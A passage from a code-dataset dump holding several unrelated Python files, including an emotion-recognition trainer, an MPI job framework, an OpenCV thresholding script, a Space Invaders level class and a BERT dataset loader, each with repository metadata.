body_train_dataset.set_scaler(scaler)#actually scaled the whole data\n body_train_dataset.to_tensors()\n body_train_dataset.prepad()\n body_train_size = body_train_dataset.__len__()\n body_train_loader = torch.utils.data.DataLoader(body_train_dataset, \n shuffle=False, \n batch_size=body_train_size, \n drop_last=True, \n num_workers=args.workers)\n print('Body training size: ', body_train_size, '\\n')\n print('Body testing size: ', body_test_size, '\\n')\n\n '''Start Testing'''\n print('Start Testing...\\n')\n \n\n train(fc_model, CE_criterion, optimizer, body_train_size, face_model, body_model, face_train_loader, face_train_dataset, body_train_loader, body_test_size, face_test_loader, face_test_dataset, body_test_loader, n, scheduler)\n\n\n\ndef train(fc_model, CE_criterion, optimizer, body_train_size, face_model, body_model, face_train_loader, face_train_dataset, body_train_loader, body_test_size, face_test_loader, face_test_dataset, body_test_loader, n, scheduler):\n if args.mode == 'train':\n fc_model.train()\n storage_face, storage_body, all_label = concate(body_train_size, face_model, body_model, face_train_loader, face_train_dataset, body_train_loader)\n concate_data = torch.cat((torch.from_numpy(storage_face), torch.from_numpy(storage_body)), 1).float().cuda()\n concate_data_val, all_label_val = 0, 0\n\n for current_epoch in trange(1, args.epochs + 1): \n if args.mode == 'train':\n concate_output = fc_model(concate_data)\n \n loss = CE_criterion(concate_output, all_label.long())\n loss.backward()\n optimizer.step()\n \n _, predicts = torch.max(concate_output, 1)\n correct_count_fc = torch.eq(predicts, all_label.cuda())\n correct_num = correct_count_fc.sum()\n train_acc = correct_num.float()/float(len(all_label))\n print('Train loss = ', loss.item())\n print('Train ACC = ', train_acc.item())\n\n\n val_acc, concate_data_val, all_label_val = validate(fc_model, CE_criterion, body_test_size, face_model, body_model, face_test_loader, face_test_dataset, body_test_loader, current_epoch, n, concate_data_val, all_label_val)\n print('[Split: %02d/%02d]\\n\\n'%(n, 10))\n scheduler.step()\n\n\ndef validate(fc_model, CE_criterion, body_test_size, face_model, body_model, face_test_loader, face_test_dataset, body_test_loader, current_epoch, performer_number, concate_data, all_label):\n fc_model.eval()\n if current_epoch == 1:\n storage_face, storage_body, all_label = concate(body_test_size, face_model, body_model, face_test_loader, face_test_dataset, body_test_loader)\n concate_data = torch.cat((torch.from_numpy(storage_face), torch.from_numpy(storage_body)), 1).float().cuda()\n \n\n with torch.no_grad():\n \n concate_output = fc_model(concate_data)\n loss = CE_criterion(concate_output, all_label.long())\n _, predicts = torch.max(concate_output, 1)\n correct_count_fc = torch.eq(predicts, all_label)\n print('Val loss = ', loss.item())\n correct_num = correct_count_fc.sum()\n val_acc = correct_num.float()/float(len(all_label))\n val_acc = np.around(val_acc.cpu().numpy(), 4)\n print('[Val acc {}/{}] = {}'.format(correct_num.float(), len(all_label), val_acc))\n\n if val_acc > 0.8 and args.mode != 'test':\n store_weight(current_epoch, fc_model.state_dict(), val_acc, performer_number)\n \n return val_acc, concate_data, all_label\n\n\ndef concate(body_size, face_model, body_model, face_loader, face_dataset, body_loader):\n feature_map_face =[]\n storage_face = np.zeros((body_size, args.num_classes))\n storage_body = np.zeros((body_size, args.num_classes))\n video_img_count = 0\n\n with torch.no_grad():\n correct_count_face, correct_count_body, correct_count_whole = 0, 0, 0\n face_model.eval()\n body_model.eval()\n bingo_temp = []\n \n '''Face Output'''\n for batch_i, (face_imgs, face_targets, _) in enumerate(face_loader):\n face_outputs, _ = face_model(face_imgs.cuda())\n face_targets = face_targets.cuda()\n face_percentage = face_outputs\n # face_percentage = torch.nn.functional.softmax(face_outputs, dim=1)\n\n for i in range(len(face_percentage.detach().cpu().numpy())):\n feature_map_face.append(face_percentage[i])#.detach().cpu().numpy()\n \n content, file_path, label = face_dataset.__content__()\n for i in range(len(content)): #videos in total\n for j in range(args.num_classes): #7 emotions in total\n for k in range(video_img_count, video_img_count + content[i]): #all imgs in each video have to add\n storage_face[i][j] += feature_map_face[k][j]\n storage_face[i][j] /= content[i]\n video_img_count += content[i]\n \n\n '''Body Output'''\n video_img_count = 0\n all_label = torch.tensor([]).cuda()\n\n for batch_i, (batch) in enumerate(body_loader):\n body, hand_right, hand_left, length, Y = batch['body'].cuda(), batch['hand_right'].cuda(), batch['hand_left'].cuda(), batch['length'].cuda(), batch['label'].cuda()\n body_outputs = body_model.forward((body, hand_right, hand_left, length))\n _, body_predicts = torch.max(body_outputs, 1)\n # body_percentage = torch.nn.functional.softmax(body_outputs, dim=1)\n # print('Y =',Y)\n all_label = torch.cat((all_label, Y), 0)\n body_percentage = body_outputs\n \n for i in range(len(body_percentage.detach().cpu().numpy())):\n for j in range(args.num_classes):\n storage_body[i + video_img_count][j] = body_percentage[i][j]#.detach().cpu().numpy()\n video_img_count += len(body_percentage.detach().cpu().numpy())\n\n \n print('len_face = ',len(storage_face))\n print('len_body = ',len(storage_body))\n print('length_concate = ',len(all_label))\n \n\n return storage_face, storage_body, all_label\n \n\ndef data_type():\n try:\n if (args.data_type == 'rafdb' or args.data_type == 'affectnet' or args.data_type == 'ferplus' or args.data_type == 'GEMEP_FACE') and args.mtcnn == False:\n args.dataset_path = args.dataset_path + args.data_type + '/'\n print('The dataset is {} and the path is {}'.format(args.data_type, args.dataset_path))\n elif args.mtcnn or args.data_type == 'new_test':\n if args.mtcnn and (args.mt_img_path == None or args.mt_save_path == None):\n raise Exception('Please enter the img path or the save path.')\n elif args.data_type == 'new_test' and args.new_test_path == None:\n raise Exception('Please enter the new test img path')\n else:\n args.dataset_path = mtcnn(args.mt_img_path, args.mt_save_path, args.new_test_path, args.mtcnn)\n args.data_type = args.phase = 'new_test'#這是一個保險,當使用者想要用mtcnn的時候忘記輸入phase和data_type\n print('Now the dataset path is {}'.format(args.mt_save_path if args.mtcnn else args.new_test_path))\n else:\n raise Exception('This dataset is not available in the model.')\n except Exception as e:\n print('You need to check your input parameter: ' + str(e))\n quit()\n \n \ndef get_scaler(test_dataset):\n scaler = {}\n feats = [\"bodies\", \"hands_right\", \"hands_left\", ]\n\n for x in feats:\n all_data = np.vstack(getattr(test_dataset, x)) \n\n scaler[x] = MinMaxScaler()\n scaler[x].fit(all_data)\n\n return scaler\n \n\ndef store_weight(epoch, model_state_dict, val_acc, fold):\n torch.save({'iter': epoch,\n 'model_state_dict': model_state_dict,},\n os.path.join('../models', args.data_type, 'split' + str(fold) + \"_epoch\" + str(epoch) + \"_acc\" + str(val_acc) + \".pth\"))\n print('Model saved.')\n\n\nif __name__ == \"__main__\":\n args = parse_args() \n test()","repo_name":"bernie6401/NTUST_Special_Topic","sub_path":"concate/train_fc_layer.py","file_name":"train_fc_layer.py","file_ext":"py","file_size_in_byte":16752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"227220309","text":"import traceback\nfrom . import validation\n\nfrom mpi4py import MPI\n\nwork_tag=0\nstop_tag=1\njob_successful_tag = 4\njob_failed_tag = 5\n\n\ndef worker(worker_class, worker_name):\n comm = MPI.COMM_WORLD\n status = MPI.Status()\n \n print('Seting up on ' + worker_name)\n worker_class.setup()\n \n while True:\n job_details = comm.recv(source=0, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag() == stop_tag: break\n\n print('Running job on ' + worker_name)\n try:\n job_results = worker_class.run_job(job_details)\n result_tag = job_successful_tag\n except Exception as e:\n full_traceback = traceback.format_exc()\n print('Failed job on ' + worker_name + '\\n' + str(full_traceback))\n job_results = worker_class.get_failed_job_result(job_details)\n result_tag = job_failed_tag\n print('Failed job caught on ' + worker_name + '. Moving on.')\n \n comm.send(obj=job_results, dest=0, tag=result_tag)\n\ndef boss(boss_class):\n comm = MPI.COMM_WORLD\n status = MPI.Status()\n num_workers = MPI.COMM_WORLD.Get_size()\n\n boss_class.setup()\n boss_class.set_total_jobs()\n \n #Dole out the first round of jobs to all workers\n for i in range(1, num_workers):\n if boss_class.jobs_available():\n next_job = boss_class.get_next_job()\n else:\n break\n comm.send(obj=next_job, dest=i, tag=work_tag)\n \n total_jobs = boss_class.total_jobs\n jobs_completed = 0\n #While there are new jobs to assign.\n #Collect results and assign new jobs as others are finished.\n while boss_class.jobs_available():\n job_result = comm.recv(source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag() == job_failed_tag:\n boss_class.process_failed_job(job_result)\n elif status.Get_tag() == job_successful_tag:\n boss_class.process_job_result(job_result)\n \n next_job = boss_class.get_next_job()\n comm.send(obj=next_job, dest=status.Get_source(), tag=work_tag)\n \n jobs_completed+=1\n print('Completed job '+str(jobs_completed)+' of '+str(total_jobs))\n \n #Collect last jobs\n for i in range(1, num_workers):\n job_result = comm.recv(source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)\n if status.Get_tag() == job_failed_tag:\n boss_class.process_failed_job(job_result)\n elif status.Get_tag() == job_successful_tag:\n boss_class.process_job_result(job_result)\n\n #Shut down all workers\n for i in range(1, num_workers):\n comm.send(obj=None, dest=i, tag=stop_tag)\n \n boss_class.process_all_results()\n\ndef run_MPI(boss_class, worker_class):\n validation.validate_boss_class(boss_class)\n validation.validate_worker_class(worker_class)\n \n rank = MPI.COMM_WORLD.Get_rank()\n name = MPI.Get_processor_name()\n\n if rank == 0:\n print('boss '+str(rank)+' on '+str(name))\n boss(boss_class)\n else:\n print('worker '+str(rank)+' on '+str(name))\n worker(worker_class, worker_name='worker'+str(rank)+'_'+str(name))\n\n","repo_name":"sdtaylor/pySimpleMPI","sub_path":"pySimpleMPI/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39272260955","text":"# O(n^2) time | O(n^2) space - where n is the number of interns and teams\ndef stableInternships(interns, teams):\n # Write your code here.\n chosenInterns = {}\n freeInterns = list(range(len(interns)))\n currentInternChoices = [0] * len(interns)\n\n teamMaps = []\n for team in teams:\n rank = {}\n for i, internNum in enumerate(team):\n rank[internNum] = i\n teamMaps.append(rank)\n\n while len(freeInterns) > 0:\n internNum = freeInterns.pop()\n\n intern = interns[internNum]\n teamPreference = intern[currentInternChoices[internNum]]\n currentInternChoices[internNum] += 1\n\n if teamPreference not in chosenInterns:\n chosenInterns[teamPreference] = internNum\n continue\n\n previousIntern = chosenInterns[teamPreference]\n previousInternRank = teamMaps[teamPreference][previousIntern]\n currentInternRank = teamMaps[teamPreference][internNum]\n\n if currentInternRank < previousInternRank:\n freeInterns.append(previousIntern)\n chosenInterns[teamPreference] = internNum\n else:\n freeInterns.append(internNum)\n\n matches = [[internNum, teamNum] for teamNum, internNum in chosenInterns.items()]\n return matches\n","repo_name":"Wanderer-Keerthi/algo-expert","sub_path":"stable_internships.py","file_name":"stable_internships.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1733606792","text":"import time\nuser_plays = True\nwhile user_plays:\n print(\"Welcome to the tip calculator!\")\n bill = float(input(\"What was the total bill? $\\n\"))\n tip = int(input(\"How much tip would you like to give? 10, 12, or 15?\\n\"))\n people = int(input(\"How many people to split the bill?\\n\"))\n\n tip_as_percent = tip / 100\n total_tip_amount = bill * tip_as_percent\n total_bill = bill + total_tip_amount\n bill_per_person = total_bill / people\n final_amount = round(bill_per_person, 2)\n\n print(f\"Each person should pay: ${final_amount}\\n\")\n user_choice = input(\"Sir Do You Want To Calculate it Again??\").lower()\n if user_choice == 'y':\n user_plays = True\n continue\n elif user_choice == 'n':\n print(\"Good Byee!\")\n user_plays = False\n break\n else:\n print(\"Invalid Command, Please Try Again!\")\n time.sleep(5)\n user_plays = False\n","repo_name":"InvisiblePro/Hacktoberfest-2022","sub_path":"Python/Tip Calculator.py","file_name":"Tip Calculator.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"15207112010","text":"import Chessnut\nimport chess\nimport chess.pgn\n\nimport sys\n\ndef long_sequence_to_pgn(seq):\n moves = seq\n game = chess.pgn.Game()\n# with open(filename, 'r') as f:\n# moves = f.read().split('\\n');\n game.setup(chess.Board(\"r1bqkbnr/pppp1ppp/2n5/4p3/4P3/5N2/PPPP1PPP/RNBQKB1R w KQkq - 2 3\"))\n node = game\n for move in moves:\n node = node.add_variation(chess.Move.from_uci(move))\n return str(game)\n\nuci_long = sys.stdin.read().strip().split('\\n')\nprint(uci_long)\nprint(long_sequence_to_pgn(uci_long))","repo_name":"TauSigma5/sc0","sub_path":"uci-to-pgn.py","file_name":"uci-to-pgn.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72156414567","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# 1. 讀取圖片→轉成灰階\nimg = cv2.imread(\"W_A1_0_3.jpg\")\n# img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #0 is black ; 255 is white 0~255不同的灰\n\n# 1-2. 直接讀取成灰階\n# img = cv2.imread(\"W_A1_0_3.jpg\", flags=cv2.IMREAD_GRAYSCALE)\n# img = cv2.imread(\"W_A1_0_3.jpg\",0) #直接讀取成單通道\n\n# 2.顯示圖片\n# cv2.imshow(\"result\",img)\n# cv2.waitKey(0)\n\n# # 定義圖片的高度與寬度、中心\n# height = img.shape[0]\n# width = img.shape[1]\n# center = (int(height/2),int(width/2))\n\n\n# -------------------------------------------------------------------\n\n# # 圖像屬性\n# print(img.shape) # 3648*5472 3通道\n\n# # 像素總數\n# print(img.size)\n\n# # 圖像類型\n# print(img.dtype) #uint8\n\n\n# # (x,y)位置的像素\n# px = img[100,100]\n# print(px) # 顯示 BGR[25 25 25]\n\n# # 顏色讀取\n# blue = img[100,100,0]\n# green = img[100,100,1]\n# red = img[100,100,2]\n# print(blue,green,red)\n\n# # 修改像素值\n# img[100,100] = [255,255,255]\n# print(img[100,100])\n\n\n# # 圖像感興趣區域ROI\n# ball = img[280:340, 330:390] #(280,340)到(330,390)框選矩形\n\n# 拆分和合併圖像通道\n# b,g,r = cv2.split(img)\n\n# -------------------------------\n\n# print(img_gray[100,100])\n\n# # cv2 is BGR ; matplotlib is RGB\n# # 做色彩轉換\n# img_mat = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\n# plt.imshow(img) #相反顏色\n# plt.show()\n# plt.imshow(img_mat) # 正確顏色\n# plt.show()\n\n# ----------------直方圖-----------------------\n\n\n# # 畫第一個圖\n# plt.subplot(221)\n# img_mat = cv2.cvtColor(img,cv2.COLOR_BGR2RGB) #轉乘RGB\n# plt.imshow(img_mat)\n\n# # 畫第二個圖\n# plt.subplot(222)\n# img_gray = cv2.cvtColor(img_mat,cv2.COLOR_RGB2GRAY) # 轉成灰度\n# plt.imshow(img_gray)\n\n# # 畫第三個圖\n# plt.subplot(223)\n# plt.hist(img.ravel(),256),plt.title(\"hist\") # img.ravel() 多維陣列轉一維; 畫素級: 256, 表示[0,255]\n\n# # 畫第四個圖\n# plt.subplot(224)\n# plt.hist(img_gray.ravel(),256),plt.title(\"hist\") \n# plt.show()\n\n# -------------------cv2-------------------------------------------------\n\nimport cv2\nimport numpy as np\n\n\n# # 1. 讀取圖片→轉成灰階\n# img = cv2.imread(\"W_A1_0_3.jpg\")\n# img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# 1-2. 直接讀取成灰階\n# img = cv2.imread(\"W_A1_0_3.jpg\", flags=cv2.IMREAD_GRAYSCALE)\n# img = cv2.imread(\"W_A1_0_3.jpg\",0)\n\n# 2.顯示圖片\n# cv2.imshow(\"result\",img)\n# cv2.waitKey(0)\n\n# --------------------------------------------------------------------------------\n\n# 讀取灰階圖片\nimg = cv2.imread(\"W_A1_0_3.jpg\",0)\n\n# 二值化\n# cv2.threshold(img,閥值,填充色,閥值類型) #要讀取灰度圖\n# ret要加\nret, Threshold1 = cv2.threshold(img,172,255,cv2.THRESH_BINARY)\n\n# Otsu's閥值\nret2, Threshold2 = cv2.threshold(img,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\n# 11為block size(計算閥值的區域大小),2為C值(閥值=平均值-C)\nThreshold3 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C , cv2.THRESH_BINARY,11,2 )\nThreshold4 = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C , cv2.THRESH_BINARY,11,2)\n\ntitles = ['original image', 'global thresholding (v=127)', 'otus thresholding','Adaptive mean thresholding', 'adaptive gaussian thresholding'] \nimages = [img,Threshold1,Threshold2,Threshold3,Threshold4]\n\n# matplotlib輸出\nfor i in range(5):\n plt.subplot(2,3,i+1), plt.imshow(images[i],\"gray\")\n plt.title(titles[i])\n plt.xticks([]),plt.yticks([]) #不畫X,y\nplt.show()\n\n# # cv2輸出\n# cv2.imshow('Original', img)\n# cv2.imshow('BINARY',Threshold1)\n# cv2.imshow('OTSU', Threshold2)\n# cv2.imshow('ADAPTIVE_THRESH_MEAN', Threshold3)\n# cv2.imshow('ADAPTIVE_THRESH_GAUSSIAN', Threshold4)\n\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n\n# --------------------------------------\n# #讀取圖片\n# img = cv2.imread('W_A1_0_3.jpg',flags=cv2.IMREAD_GRAYSCALE)\n# iter_time = 1\n\n# kernel = np.ones((3,3),np.uint8)\n# closing_img = cv2.morphologyEx(img,cv2.MORPH_CLOSE,kernel,iterations=iter_time)\n\n# cv2.imwrite('dao_closing_k5_iter%d.png'%(iter_time), np.hstack((img, closing_img)))\n","repo_name":"finemtt1/Python","sub_path":"image_processing/0.img_base_meth.py","file_name":"0.img_base_meth.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9569711354","text":"from tensorflow.keras.models import load_model\nimport numpy as np\nfrom PIL import Image\nfrom logConfig import logging\nimport heapq\nfrom repository import getPlant\n\nlogging.info(\"-----Loading model-----\\n\\n\\n\")\n\n# loading model\nmodel = load_model(\"model\")\n\nlogging.info(\"-----Model Loaded-----\\n\\n\\n\")\n\n\n# defining classes\nclasses = [ 'Arive-Dantu','Betel','Basale','Crape_Jasmine','Curry','Drumstick','Fenugreek','Guava','Hibiscus','Indian_Beech','Indian_Mustard','Jackfruit',\n 'Jamaica_Cherry-Gasagase','Jamun','Jasmine','Karanda','Lemon','Mango','Mexican_Mint','Mint','Neem','Oleander','Parijata','Peepal','Pomegranate',\n 'Rasna','Rose_apple','Roxburgh_fig','Sandalwood','Tulsi']\n\n\n# classification function\ndef classify(imagePath):\n\n # enclosing in try block to catch exception\n try:\n logging.info(\"-----Classify image with path = %s-----\",imagePath)\n\n # loading image from path and converting to numpy array for prediction\n image = Image.open(imagePath)\n image = np.array(image)\n image = image.reshape(1,image.shape[0],image.shape[1],3)\n\n # ---- classication flow starts ----\n\n # prediction\n prediction = model.predict(image)[0]\n\n # finding the top class and its prediction score (accuracy)\n _class = np.argmax(prediction)\n predictionScore = prediction[_class]\n print(classes[_class],predictionScore)\n\n # ---- Result logic starts ----\n\n # if predictionScore greater than 90% return single class\n if(predictionScore>0.90):\n logging.info(\"-----Classification report = %s probability = %s-----\",classes[_class],predictionScore)\n result = []\n details = getPlant(id=_class+1)\n result.append({\"class\":classes[_class],\"confidence\":float(prediction[_class]),\"details\":details})\n return result\n\n # if 90 >= predictionScore > 80 return two classes\n elif(predictionScore>0.80):\n logging.info(\"-----Classification probability less than 90% Returning top 2 classes-----\")\n result = []\n _class = heapq.nlargest(2, range(len(prediction)), key=prediction.__getitem__)\n for i in _class:\n details = getPlant(id=i+1)\n result.append({\"class\":classes[i],\"confidence\":float(prediction[i]),\"details\":details})\n return result\n \n # if 80 >= predictionScore > 70 return two classes\n elif(predictionScore>=0.70):\n logging.info(\"-----Classification probability less than 80% Returning top 3 classes-----\")\n result = []\n _class = heapq.nlargest(3, range(len(prediction)), key=prediction.__getitem__)\n for i in _class:\n details = getPlant(id=i+1)\n result.append({\"class\":classes[i],\"confidence\":float(prediction[i]),\"details\":details})\n return result\n \n # accuracy criteria not satisfied\n else:\n return \"Not satisfied\"\n \n # ---- Result logic starts ----\n\n # ---- classication flow ends ----\n\n # catch exception if any\n except Exception as e:\n print(e)\n return \"error\"\n\n\n# classify(\"uploads/__0_1104004.png\")","repo_name":"vishnuoum/Medicinal-Plant-Classification","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31513402391","text":"from graphics import *\nfrom swarm import *\nfrom mothership import *\nfrom alien import *\nfrom player import *\n\nclass Level:\n def __init__(self, level_str, player, ser, win):\n self.win = win\n if player == None:\n self.player = Player(self.win)\n else:\n self.player = player\n self.ser = ser\n self.swarm = Swarm(level_str, self.win)\n self.alien_bullets = []\n self.player_bullets = []\n self.shield_bullets = []\n self.finished = False\n self.player_won = False\n self.win_message = Text(Point(self.win.getWidth() / 2, self.win.getHeight() / 2), \"Level cleared!\")\n self.score = Text(Point(self.win.getWidth() / 2, 70 + self.win.getHeight() / 2), \"\")\n self.end_message = Text(Point(self.win.getWidth() / 2, 40 + self.win.getHeight() / 2), \"Press enter to continue.\")\n self.mothership = None\n\n def run(self):\n\n while not self.finished:\n self.swarm.move()\n self.doMothership()\n self.moveBullets()\n\n self.alien_bullets += self.swarm.shoot()\n\n key = self.win.checkKey()\n serial_data = self.ser.readLine()\n if key == \"Left\" or serial_data[1] != 0:\n self.player.moveLeft(serial_data[1])\n elif key == \"Right\" or serial_data[1] != 0:\n self.player.moveRight(serial_data[1])\n if key == \"space\" or serial_data[2] == 0:\n bullet = self.player.shoot()\n if bullet != None:\n self.player_bullets.append(bullet)\n if key == \"Return\" or serial_data[0]:\n if self.player.hasAbility():\n self.player.addScore(200)\n self.player_bullets.append(self.player.useAbility())\n \n\n self.finished, self.player_won = self.checkAllCollisions()\n\n if not self.player_won: \n self.win_message.setText(\"Better luck next time!\")\n self.score.setText(\"Score: \" + self.player.getScore())\n self.end_message.setText(\"Press q to exit, or Enter to try again.\")\n\n self.win_message.setSize(36)\n self.win_message.setTextColor(\"light green\")\n self.win_message.draw(self.win)\n self.score.setSize(25)\n self.score.setTextColor(\"white\")\n self.score.draw(self.win)\n self.end_message.setSize(20)\n self.end_message.setTextColor(\"white\")\n self.end_message.draw(self.win)\n key = self.win.getKey()\n while key != \"q\" and key != \"Return\":\n key = self.win.getKey()\n self.endLevel()\n return self.player_won, self.player, key\n \n def getPlayer(self):\n return self.player\n\n def moveBullets(self):\n for bullet in self.alien_bullets:\n bullet.move()\n for bullet in self.player_bullets:\n bullet.move()\n for bullet in self.shield_bullets:\n bullet.move()\n\n def hasMothership(self):\n return not self.mothership == None\n\n def doMothership(self):\n if self.hasMothership():\n if self.mothership.isDead():\n self.mothership = None\n return\n self.mothership.move()\n else:\n if randint(0, 1000) < 1:\n self.mothership = Mothership(randint(0, 1), self.win)\n\n def checkAllCollisions(self):\n if self.checkAlienBulletCollisions() or self.checkPlayerCollisions():\n return True, False\n elif self.checkPlayerBulletCollisions():\n return True, True\n return False, False\n\n def checkAlienBulletCollisions(self):\n for bullet in self.alien_bullets:\n if bullet.isDead():\n continue\n if bullet.isColliding(self.player):\n killed = self.player.kill()\n bullet.kill()\n if killed:\n return True\n\n def checkPlayerCollisions(self):\n found_collision, _ = self.swarm.checkCollisionWith(self.player)\n if found_collision:\n self.player.kill()\n return True\n\n for bullet in self.shield_bullets:\n if not bullet.isDead() and bullet.isColliding(self.player):\n bullet.kill()\n self.player.setShield()\n self.player.addScore(50)\n\n def checkPlayerBulletCollisions(self):\n for bullet in self.player_bullets:\n if bullet.isDead():\n continue\n\n if self.hasMothership():\n if bullet.isColliding(self.mothership):\n self.mothership.kill()\n self.checkNewBullets(bullet.kill())\n self.shield_bullets.append(self.mothership.spawnShieldBullet(self.player.bottom()))\n self.player.addScore(200)\n\n for alien_bullet in self.alien_bullets:\n if alien_bullet.isDead():\n continue\n if bullet.isColliding(alien_bullet):\n self.checkNewBullets(bullet.kill())\n alien_bullet.kill()\n self.player.addScore(50)\n\n for shield_bullet in self.shield_bullets:\n if shield_bullet.isDead():\n continue\n if shield_bullet.isColliding(bullet):\n self.checkNewBullets(bullet.kill())\n shield_bullet.kill()\n self.player.setShield()\n\n found_collision, collisions = self.swarm.checkCollisionWith(bullet)\n if found_collision:\n for collision in collisions:\n self.player.addScore(100)\n collision.kill()\n self.checkNewBullets(bullet.kill())\n death_attack = collision.deathAttack()\n if not death_attack == None:\n self.alien_bullets.append(death_attack)\n self.player.doPowerup(collision.id())\n self.swarm.intensify(len(collisions))\n return self.swarm.isDead()\n\n def checkNewBullets(self, bullets):\n if bullets == None:\n return\n self.player_bullets += bullets\n\n def endLevel(self):\n self.swarm.clear()\n if not self.player_won:\n self.player.clear()\n self.win_message.undraw()\n self.end_message.undraw()\n self.score.undraw()\n if self.hasMothership():\n self.mothership.kill()\n for bullet in self.alien_bullets:\n bullet.kill()\n for bullet in self.player_bullets:\n bullet.kill()\n for bullet in self.shield_bullets:\n bullet.kill()\n del self.alien_bullets\n del self.player_bullets\n del self.shield_bullets\n","repo_name":"tgomezzzz/space_invaders_arduino","sub_path":"src/level.py","file_name":"level.py","file_ext":"py","file_size_in_byte":6827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7787704611","text":"import numpy as np\nn = int(input(\"Enter the limit: \"))\na = []\nprint(\"Enter the elements: \")\nfor i in range(n):\n a.append(int(input()))\nprint(\"Before sorting - \")\nfor i in a:\n print(i)\nfor i in range(0, len(a)):\n for j in range(i + 1, len(a)):\n if a[j] < a[i]:\n temp = a[j]\n a[j] = a[i]\n a[i] = temp\nprint(\"\\nAfter sorting - \")\nfor i in a:\n print(i, end=\" \")","repo_name":"Abinalakalathil/Data-science-final-exam","sub_path":"bubble sort.py","file_name":"bubble sort.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10589428381","text":"import random\n\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.data import Dataset\nimport torchtext\n\nfrom language.dataset.vocab import get_vocab\nfrom language.utils.log import get_logger\n\n\nlogger = get_logger()\n\n\nclass BertDataset(Dataset):\n \"\"\"\n Dataset for bert training.\n\n Reference: http://d2l.ai/chapter_natural-language-processing-pretraining/glove.html.\n \"\"\"\n\n def __init__(self, data_path, vocab_path, min_freq, specials, ignore_case, max_len, **kwargs):\n \"\"\"\n :param data_path: path to dataset.\n :param vocab_path: path to vocab file.\n :param min_freq: minimum frequency.\n :param specials: List[str], special symbols to add.\n :param ignore_case: bool, whether to ignore case.\n :param max_len: max length of sentence pair.\n \"\"\"\n super().__init__()\n logger.info(f'Loading raw paragraphs from: {data_path}...')\n raw_paragraphs = self._get_raw_paragraphs(data_path)\n if ignore_case:\n raw_paragraphs = [[[token.lower() for token in line]\n for line in paragraph]\n for paragraph in raw_paragraphs]\n logger.info(f'Got {len(raw_paragraphs)} raw paragraphs.')\n\n raw_lines = [line for paragraph in raw_paragraphs for line in paragraph]\n self._vocab = get_vocab(vocab_path, raw_lines, min_freq, specials)\n logger.info(f'Vocab size: {len(self._vocab)}.')\n logger.info(f'Replace raw token with token index.')\n paragraphs = [[self._vocab.lookup_indices(line) for line in paragraph] for paragraph in raw_paragraphs]\n\n self._max_len = max_len\n sentence_pair_data = self._get_sentence_pair_data(paragraphs, self._vocab, max_len)\n self._data = self._setup_data(sentence_pair_data, self._vocab)\n logger.info(f'Dataset is ready, size: {len(self)}.')\n\n def _get_raw_paragraphs(self, data_path, **kwargs):\n \"\"\"\n :param data_path: path to data.\n :return: List[List[List[token]]].\n \"\"\"\n raise NotImplementedError\n\n @staticmethod\n def _get_sentence_pair_data(paragraphs, vocab, max_len):\n \"\"\"\n Get sentence pair data.\n :param paragraphs: List[List[List[token_index]]]\n :param vocab: torchtext.vocab.Vocab.\n :param max_len: int, max length of sentence pair.\n :return: List[dict].\n \"\"\"\n logger.info(f'Setup sentence pair data...')\n sentence_pair_data = list()\n paragraph_index_list = list(range(len(paragraphs)))\n for i, paragraph in tqdm(enumerate(paragraphs), total=len(paragraphs)):\n for j in range(len(paragraph) - 1):\n tokens_a = paragraph[j]\n\n # tokens_b\n is_next = random.random() < 0.5\n if is_next:\n tokens_b = paragraph[j + 1]\n else:\n chosen_paragraph_index = i\n while chosen_paragraph_index == i:\n chosen_paragraph_index = random.choice(paragraph_index_list)\n tokens_b = random.choice(paragraphs[chosen_paragraph_index])\n\n # 1 '' token and 2 '' tokens\n redundant_len = len(tokens_a) + len(tokens_b) + 3 - max_len\n if redundant_len > 0:\n left = int(len(tokens_a) / (len(tokens_a) + len(tokens_b)) * redundant_len)\n right = redundant_len - left\n tokens_a = tokens_a[left:]\n tokens_b = tokens_b[:len(tokens_b) - right]\n\n # combine tokens\n tokens = [vocab['']] + tokens_a + [vocab['']] + tokens_b + [vocab['']]\n # 0 and 1 are marking segment A and B, respectively\n segments = [0] * (len(tokens_a) + 2) + [1] * (len(tokens_b) + 1)\n sentence_pair_data.append({\n 'tokens': tokens,\n 'segments': segments,\n 'is_next': is_next\n })\n logger.info(f'Got {len(sentence_pair_data)} sentence pair.')\n return sentence_pair_data\n\n @staticmethod\n def _setup_data(sentence_pair_data, vocab):\n \"\"\"\n Setup data for bert training.\n :param sentence_pair_data: List[dict].\n :param vocab: torchtext.vocab.Vocab\n :return: List[dict].\n \"\"\"\n logger.info(f'Setup data for bert training...')\n for data in 